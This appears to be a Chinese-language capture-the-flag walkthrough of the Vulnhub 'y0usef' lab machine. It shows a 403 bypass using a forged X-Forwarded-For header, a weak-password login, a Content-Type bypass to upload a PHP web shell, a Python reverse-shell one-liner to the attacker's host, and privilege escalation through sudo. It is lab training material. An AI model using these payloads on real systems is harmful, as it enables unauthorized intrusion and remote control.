Vulnhub靶机-y0usef

admin 2023年5月25日09:05:52评论27 views字数 2125阅读7分5秒阅读模式
Vulnhub靶机-y0usef

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

Vulnhub靶机-y0usef

y0usef

[靶机地址]: 

https://download.vulnhub.com/y0usef/y0usef.ova


Vulnhub靶机-y0usef

内容简介

难度:低
目标:取得 root 权限 + 2 Flag
主要运用攻击手段:

  • 主机发现 

  • 端口扫描 

  • WEB信息收集 

  • 指纹探测 

  • 弱口令 

  • 403 Bypass 

  • 文件上传及绕过 

  • base64编码 

  • 本地提权

Vulnhub靶机-y0usef

环境准备

下载好文件,导入VM Virtualbox虚拟机。
攻击机kali:10.0.2.4
靶机:10.0.2.8


Vulnhub靶机-y0usef

攻击开始

1.主机发现

arp-scan -l

Vulnhub靶机-y0usef

2.端口扫描

nmap -p- 10.0.2.8

Vulnhub靶机-y0usef

3.服务发现

nmap -p22,80 -sV 10.0.2.8

Vulnhub靶机-y0usef

4.收集信息

80端口开启着web服务,我们直接访问。

Vulnhub靶机-y0usef

通过对页面进行信息收集,并没有发现有用的信息。
查看目标靶机网站架构组成。

whatweb http://10.0.2.8

Vulnhub靶机-y0usef

Apache后端web服务,Bootstrap前端框架,系统是Ubuntu,使用的语言是PHP-5.5.9。
扫描目标靶机的目录。

Vulnhub靶机-y0usef

出现很多403响应码表示拒绝访问,经过测试/index.php/index.php/login/仍是主页,但是有一个路径/adminstration,尝试访问。

Vulnhub靶机-y0usef

依旧是拒绝访问,说明这个地址是存在的,但是我们的权限很低没有办法访问,这个说明目标靶机的管理员做过权限控制,但是很多时候管理员做的权限控制很存在安全隐患,我们尝试是否可以绕过403授权限制。

5.403 Bypass

burp suite抓包。

Vulnhub靶机-y0usef

修改数据包头部,添加X-Fprwarded-For让目标靶机认为这个请求是来自他自己的请求

Vulnhub靶机-y0usef

成功访问。

Vulnhub靶机-y0usef

6.测试漏洞

我们尝试登录,最终经过测试目标靶机存在弱口令adminadmin,继续burp suite抓包,每一个包都加上X-Forwarded-For: 127.0.0.1,然后forward

Vulnhub靶机-y0usef

Vulnhub靶机-y0usef

成功进入后台,在后台中我们发现了Upload file,依旧利用burp suite进行访问,进入Upload file页面。

Vulnhub靶机-y0usef

7.文件上传

上传一个shell

<?php $var=shell_exec($_GET['axpmyw']); echo $var ?>

Vulnhub靶机-y0usef

我们直接上传php的shell

Vulnhub靶机-y0usef

Vulnhub靶机-y0usef

发现目标靶机有限制,不允许上传,尝试绕过限制,经过测试当修改Content-Type时可以上传成功。

Vulnhub靶机-y0usef

利用BurpSuite访问。

Vulnhub靶机-y0usef

传入参数。

?axpmyw=id

Vulnhub靶机-y0usef

8.反弹shell

shell成功上传,并且可以利用shell执行命令,查看一下目标靶机有没有python环境。

?axpmyw=which python

Vulnhub靶机-y0usef

有python环境,我们可以利用python反弹shell,脚本如下:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.4",4444));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

开启监听。

Vulnhub靶机-y0usef

反弹shell

Vulnhub靶机-y0usef

成功获取一个shell

Vulnhub靶机-y0usef

升级一下目标靶机的shell

python -c "import pty; pty.spawn('/bin/bash')"

 

Vulnhub靶机-y0usef

/home目录下找到一个flag

Vulnhub靶机-y0usef

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

这一段明显是一串base64编码,尝试解码。

ssh : 
user : yousef
pass : yousef123

提示ssh的用户名和密码,ssh登录。

Vulnhub靶机-y0usef

通过查看id发现youser账号可以执行sudo命令,而且可以运行这个靶机上的所有程序。

Vulnhub靶机-y0usef

9.权限提升

切换root权限。

Vulnhub靶机-y0usef

/root目录下发现了第二个flag

Vulnhub靶机-y0usef

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

很明显也是base64编码,进行解码。

You've got the root Congratulations any feedback content me twitter @y0usef_11

这是靶机作者的一段留言。



安恒信息

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

Vulnhub靶机-y0usef

END

Vulnhub靶机-y0usef
Vulnhub靶机-y0usef
Vulnhub靶机-y0usef

长按识别二维码关注我们


原文始发于微信公众号(白帽子):Vulnhub靶机-y0usef

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月25日09:05:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机-y0usefhttps://cn-sec.com/archives/1756224.html

发表评论

匿名网友 填写信息